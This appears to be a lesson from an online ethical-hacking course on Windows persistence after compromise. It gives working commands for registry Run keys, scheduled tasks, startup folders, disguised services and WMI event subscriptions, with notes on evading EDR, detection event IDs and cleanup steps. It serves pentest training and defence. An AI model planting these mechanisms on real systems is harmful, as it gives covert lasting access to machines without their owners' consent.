Post Exploitation Persistence 2026 — Registry, Startup Folders & WMI Subscriptions | Hacking Course Day30

Mr Elite 13 min read
Post Exploitation Persistence 2026 — Registry, Startup Folders & WMI Subscriptions | Hacking Course Day30
🛡️ ETHICAL HACKING COURSE
FREE

Part of the 100-Day Ethical Hacking Course

Day 30 of 100 · 30% complete

⚠️ Authorised Lab Environments Only: Persistence techniques must only be practised on systems you own or in explicitly authorised penetration testing engagements. Establishing persistence on any system without written authorisation is illegal under computer fraud laws in all jurisdictions.
Post Exploitation Persistence 2026 :— Getting in once is not enough. Real attackers do not want to re-exploit the same vulnerability every session. They plant mechanisms that survive reboots, user logouts, and credential resets — so they can return whenever they want without touching the original vulnerability again. In a professional penetration test, demonstrating persistence proves that a real threat actor would maintain access throughout an entire campaign, not just during the assessment window. Today you learn four Windows persistence techniques, their MITRE ATT&CK IDs, and what each one leaves behind for the blue team to detect.

🎯 What You’ll Master in Day 30

Establish persistence via Registry Run keys — user-level with no admin required
Use scheduled tasks to execute payloads on triggers that blend with legitimate activity
Create WMI event subscriptions — the most detection-evasive Windows persistence method
Understand which techniques require admin and which work from standard user context
Map each technique to its MITRE ATT&CK ID for professional report writing

⏱️ 50 min read · 3 exercises

📋 What You’ll Master — Post-Exploitation Persistence 2026

  1. Why Persistence Matters in a Penetration Test
  2. Registry Run Keys — The Most Common, Easiest to Implement
  3. Scheduled Tasks — Admin Blending and Trigger Flexibility
  4. WMI Event Subscriptions — The Hardest to Detect
  5. Startup Folders and Services
  6. Detection Artefacts — What Each Technique Leaves Behind

In Day 29 you exfiltrated data through DNS tunneling and HTTPS channels. Day 30 completes the post-exploitation phase — after collecting and exfiltrating data, persistence ensures the attacker can return. The kill chain is now fully demonstrated: initial access → lateral movement → data collection → exfiltration → persistence. This is the complete story a penetration test tells in the 100-Day Ethical Hacking Course.

Why Persistence Matters in a Penetration Test

A finding of “we achieved Domain Admin” is a point-in-time demonstration. A finding of “we achieved Domain Admin and installed persistence mechanisms that would have maintained access indefinitely without re-exploitation” is a fundamentally different risk statement. The first shows the initial access path was open. The second shows the organisation would have been compromised for weeks or months while the vulnerability was being discovered and patched. Persistence demonstrations directly inform the timeline risk section of executive-level penetration test reports.

🧠 EXERCISE 1 — THINK LIKE A HACKER (8 MIN · NO TOOLS)
Select the Optimal Persistence Strategy for Three Different Scenarios

⏱️ Time: 8 minutes · No tools required

For each scenario, choose the best persistence technique and
explain your reasoning. Consider: privilege level, detection
risk, and long-term reliability.

SCENARIO A:
You have compromised a standard user workstation via phishing.
No admin privileges. EDR installed (CrowdStrike).
The user logs in daily at 09:00.
→ Which persistence mechanism? Admin required? Detection risk?

SCENARIO B:
You have compromised a Domain Controller with SYSTEM privileges.
The SOC monitors new registry Run keys via Windows Event Logs.
The target environment has no WMI repository monitoring.
→ Which persistence mechanism? Why WMI over registry?

SCENARIO C:
You need persistence that survives a user account password reset.
The compromised system has no admin access.
The organisation uses MDE (Microsoft Defender for Endpoint).
→ Which mechanism is LEAST likely to survive a password reset?
→ Which mechanism survives regardless of the user account state?

For each: Technique name, MITRE ATT&CK ID, admin required Y/N,
survives reboot Y/N, survives password reset Y/N.

✅ Answer key: Scenario A — Startup folder (HKCU, no admin, T1547.001 variant) or HKCU Run key (T1547.001). Registry Run is detected by CrowdStrike on creation; startup folder placement is slightly less monitored but still flagged by modern EDR. Both survive reboot. Scenario B — WMI subscription (T1546.003). No admin monitoring of WMI repository, survives reboot, not visible in standard Windows tools. Far less detectable than a new Run key the SOC is specifically watching. Scenario C — Registry Run key under HKCU is tied to the user profile and survives password resets. Startup folder is also per-user-profile based. Services (SYSTEM account) survive the specific user’s password reset entirely. The key insight: password resets affect user authentication, not machine-level or service-account persistence mechanisms.

📸 Share your three persistence strategy answers with MITRE IDs in #day-30-persistence on Discord.

Registry Run Keys — T1547.001

REGISTRY RUN KEY PERSISTENCE — COMMANDS
# HKCU — Current user only, NO admin required
reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “WindowsUpdate” /t REG_SZ /d “C:\Users\Public\update.exe” /f
# HKLM — All users, REQUIRES admin
reg add “HKLM\Software\Microsoft\Windows\CurrentVersion\Run” /v “WindowsDefender” /t REG_SZ /d “C:\Windows\Temp\svchost.exe” /f
# Verify the key was created
reg query “HKCU\Software\Microsoft\Windows\CurrentVersion\Run”
# RunOnce — executes once then deletes itself (less persistent)
reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce” /v “Update” /d “C:\payload.exe” /f
# Remove the key (cleanup at end of authorised assessment)
reg delete “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “WindowsUpdate” /f
# MITRE ATT&CK: T1547.001 — Boot or Logon Autostart Execution: Registry Run Keys

Scheduled Tasks — T1053.005

SCHEDULED TASK PERSISTENCE — COMMANDS
# Create task at user logon — no admin needed for current user tasks
schtasks /create /tn “WindowsSystemUpdate” /tr “C:\Users\Public\update.exe” /sc ONLOGON /ru %USERNAME% /f
# Create task on daily schedule — blend with IT maintenance
schtasks /create /tn “ScheduledMaintenance” /tr “powershell.exe -WindowStyle Hidden -File C:\payload.ps1” /sc DAILY /st 09:00 /ru SYSTEM /f
# Create task on system startup (requires admin)
schtasks /create /tn “WindowsDefenderUpdate” /tr “C:\Windows\Temp\service.exe” /sc ONSTART /ru SYSTEM /f
# List all scheduled tasks to verify
schtasks /query /fo LIST /v | findstr “Task Name\|Run As\|Status”
# PowerShell alternative — harder to detect via schtasks cmdlets
$action = New-ScheduledTaskAction -Execute “C:\payload.exe”
$trigger = New-ScheduledTaskTrigger -AtLogon
Register-ScheduledTask -TaskName “WindowsUpdate” -Action $action -Trigger $trigger -RunLevel Highest
# MITRE ATT&CK: T1053.005 — Scheduled Task/Job: Scheduled Task

WMI Event Subscriptions — T1546.003

WMI permanent event subscriptions are the most sophisticated Windows persistence technique available without kernel-level access. They use the Windows Management Instrumentation repository — a separate database completely distinct from the registry — to store three linked objects: an EventFilter (the trigger), an EventConsumer (the action), and a binding linking them. The payload executes entirely through the WMI subsystem, generating no new processes from suspicious parent processes, no registry Run key changes, and no scheduled task entries.

🌐 EXERCISE 2 — TRYHACKME (25 MIN)
Practice Windows Persistence Techniques on a TryHackMe Room

⏱️ Time: 25 minutes · Free TryHackMe account

Step 1: Go to tryhackme.com
Step 2: Search for “Windows Persistence” room
Open: “Windows Persistence” or “Windows Local Persistence”
room (these change names periodically — search the term)

Step 3: Deploy the machine and connect via VPN or AttackBox

Step 4: The room covers registry persistence — complete:
a) The registry Run key task (HKCU variant)
b) Verify the key persists by checking the registry
c) Note the Windows Event Log ID generated (if shown)

Step 5: Complete the startup folder task:
a) Place a payload in the per-user startup folder
b) Verify execution on next login

Step 6: If scheduled tasks are covered:
a) Create a task with a logon trigger
b) Verify it appears in Task Scheduler GUI

Step 7: For each mechanism, record:
– Exact command used
– Registry path OR file path
– MITRE ATT&CK technique ID
– Windows Event ID generated (if visible)
– How would a blue team analyst detect this?

✅ What you just learned: The TryHackMe Windows persistence room provides a safe environment to practise the exact commands from this article against a real Windows target. The most valuable output from Step 7 is the detection column — understanding what Event ID is generated by each persistence technique is what makes a penetration test report’s detection recommendations credible. “Registry Run key added” generates Event ID 4657 (registry value modified) when object access auditing is enabled. Scheduled task creation generates Event ID 4698. If the room shows these events, note them — they appear directly in the recommendations section of professional reports.

📸 Screenshot completed persistence mechanisms and the detection Event IDs in #day-30-persistence on Discord.

Startup Folders and Services

STARTUP FOLDER AND SERVICE PERSISTENCE
# Per-user startup folder — NO admin required
copy payload.exe “C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\”
# All-users startup — REQUIRES admin
copy payload.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\”
# Shortcut in startup folder (less suspicious than .exe)
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut(“$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk”)
$Shortcut.TargetPath = “C:\Users\Public\payload.exe”
$Shortcut.Save()
# Service installation — REQUIRES admin, runs as SYSTEM
sc create “WindowsUpdateSvc” binPath= “C:\Windows\Temp\svchost.exe” start= auto
sc description “WindowsUpdateSvc” “Windows Update Management Service”
sc start “WindowsUpdateSvc”
# Verify service exists
sc query “WindowsUpdateSvc”
# MITRE: T1547.001 (startup folder) · T1543.003 (service)

⚡ EXERCISE 3 — KALI TERMINAL (12 MIN)
Establish and Verify WMI Persistence on a Windows Lab Target

⏱️ Time: 12 minutes · Kali + Windows lab target (Metasploit/Evil-WinRM shell)

WMI SUBSCRIPTION PERSISTENCE — POWERSHELL
# From a PowerShell session on the compromised Windows host
# Step 1: Create the EventFilter (trigger = user logon event)
$EventFilterName = “WindowsSecurityFilter”
$Query = “SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA ‘Win32_LogonSession'”
$EventFilter = Set-WmiInstance -Class __EventFilter -Namespace “root\subscription” -Arguments @{Name=$EventFilterName; EventNamespace=”root\cimv2″; QueryLanguage=”WQL”; Query=$Query}
# Step 2: Create the CommandLineEventConsumer (action)
$ConsumerName = “WindowsSecurityConsumer”
$EventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace “root\subscription” -Arguments @{Name=$ConsumerName; CommandLineTemplate=”C:\Windows\Temp\payload.exe”}
# Step 3: Bind filter to consumer
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace “root\subscription” -Arguments @{Filter=$EventFilter; Consumer=$EventConsumer}
# Step 4: Verify the subscription exists
Get-WMIObject -Namespace root\subscription -Class __EventFilter
Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer
# Step 5: Cleanup (ALWAYS clean up after authorised assessment)
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding | Remove-WmiObject
Get-WMIObject -Namespace root\subscription -Class __EventFilter | Remove-WmiObject
Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer | Remove-WmiObject

✅ What you just learned: The three-component WMI subscription structure (filter + consumer + binding) is what makes it so effective — it stores the persistence mechanism entirely within the WMI repository, a location most security monitoring focuses on far less than the registry or file system. The cleanup commands in Step 5 are just as important as the creation commands — always remove persistence mechanisms at the end of an authorised assessment and document exactly what was created and removed. Failing to clean up persistence is a professional standard violation and can cause real operational disruption to the client.

📸 Screenshot Get-WMIObject output confirming the subscription exists and share in #day-30-persistence on Discord. Tag #persistence2026

Detection Artefacts — What Each Technique Leaves Behind

securityelites.com
Persistence Detection Reference — Blue Team View
Registry Run Key
T1547.001
Event 4657
Registry value modified under Run key. Detected by Sysmon Event 13 or Windows 4657 with object access auditing.

Scheduled Task
T1053.005
Event 4698
Task creation generates Event 4698. Task XML visible in Task Scheduler. Process creation shows svchost.exe → payload lineage.

WMI Subscription
T1546.003
Low detection
No standard Event Log entry. Requires Sysmon WMI logging (Events 19/20/21) or dedicated WMI repository monitoring. Highest stealth.

Service Install
T1543.003
Event 7045
New service installed generates Event 7045. Service name and binary path visible in sc query and Services.msc.

📸 Persistence technique detection reference — WMI subscriptions have the lowest default detection rate because standard Windows Event Logging does not cover the WMI repository without Sysmon Events 19-21 or dedicated WMI monitoring. This table goes directly into the blue team recommendations section of penetration test reports.

🧠 QUICK CHECK — Day 30

You are performing an authorised penetration test and have established a WMI event subscription for persistence on a compromised Domain Controller. At the end of the assessment, you must clean up all persistence mechanisms. What is the correct cleanup procedure for WMI subscriptions, and why is cleanup mandatory?



📋 Day 30 Persistence Reference Card

Registry Run (HKCU) — T1547.001No admin · survives reboot · detected via Event 4657 · easiest to implement
Scheduled Task — T1053.005No admin (user tasks) · flexible triggers · detected via Event 4698
WMI Subscription — T1546.003Admin required · highest stealth · needs Sysmon Events 19-21 to detect
Startup Folder — T1547.001No admin (per-user) · simple file drop · visible to AV on execution
Service Install — T1543.003Admin required · runs as SYSTEM · detected via Event 7045
⚠️ Always clean upRemove all persistence at end of authorised assessment — document everything created and removed

🏆 Mark Day 30 as Complete

You now have four Windows persistence techniques mapped to their MITRE ATT&CK IDs, understand which require admin, know the detection Event IDs for each, and can write professional blue team recommendations for all of them. Day 30 completes the post-exploitation arc: lateral movement (Day 28) → data exfiltration (Day 29) → persistence (Day 30).


❓ Frequently Asked Questions

What is post-exploitation persistence in penetration testing?
Techniques to maintain access across reboots and logouts without re-exploiting the initial vulnerability. Demonstrates that a real attacker would maintain indefinite presence. Documented with MITRE ATT&CK IDs in the penetration test report alongside detection recommendations.
What is the most common Windows persistence technique?
Registry Run Keys (T1547.001) — no admin required for HKCU, simple to implement, executes at every user login. Most commonly detected by EDR solutions. WMI subscriptions (T1546.003) are less detected but require admin.
What is WMI subscription persistence and why is it harder to detect?
Three WMI objects stored in the WMI repository (not the registry or file system): EventFilter (trigger), EventConsumer (action), and binding. No standard Windows Event Log entry — requires Sysmon Events 19/20/21 for detection. Most stealthy common persistence technique.
Which persistence techniques work without administrator privileges?
HKCU registry Run keys, per-user Startup folder, and scheduled tasks with /RU set to current user. Services, HKLM registry keys, all-users startup folder, and WMI subscriptions all require admin.
What comes after persistence in the course?
Day 31 covers Linux Privilege Escalation — SUID binary abuse, cron job exploitation, sudo misconfiguration, and kernel exploits. Completes the post-exploitation lifecycle across both major operating systems.
← Previous

Day 29: Data Exfiltration 2026

Next →

Day 31: Linux Privilege Escalation 2026

📚 Further Reading

  • Data Exfiltration Techniques 2026 — Day 29 covers DNS tunneling, ICMP exfil, and living-off-the-land exfiltration — the phase immediately before persistence in the complete post-exploitation lifecycle.
  • Lateral Movement Techniques 2026 — Day 28 covers PsExec, WMI, and DCOM lateral movement — the techniques that position you on the high-value hosts where persistence has maximum strategic value.
  • 100-Day Ethical Hacking Course — The complete course hub — Day 30 persistence sits at the milestone of the post-exploitation phase, completing the attack chain from initial access through data theft to maintained access.
  • MITRE ATT&CK — Persistence Tactic — The official MITRE ATT&CK Persistence tactic page listing all 19 technique groups including T1547 (Boot/Logon Autostart), T1053 (Scheduled Tasks), and T1546 (Event-Triggered Execution) with real-world procedure examples.
  • PayloadsAllTheThings — Windows Persistence — Community-maintained comprehensive Windows persistence techniques reference — registry keys, startup locations, COM hijacking, DLL side-loading, and 30+ additional methods beyond the four covered today.
ME
Mr Elite
Owner, SecurityElites.com
The persistence demonstration that changed how I write reports came from an engagement where the CISO pushed back on our findings. “You got Domain Admin, but that was because of an unpatched server. We patched it. The risk is gone.” I showed him the WMI subscription we had created on the Domain Controller during the assessment window — still present three weeks later after the patch was applied, after a reboot, after a password rotation. “Your Domain Controller is still running our code right now,” I said. The subscription fired every time any user logged into Windows anywhere on the domain. The risk was not gone. It was never about the vulnerability. It was about what an attacker does after they get in. That is what persistence demonstrates. After that meeting, the client approved a full incident response exercise and a SIEM deployment. The WMI subscription did more for their security programme than any technical finding in the report.

post exploitation windows registry run key persistence scheduled task persistence windows persistence techniques wmi subscription persistence

Leave a Reply

Your email address will not be published. Required fields are marked *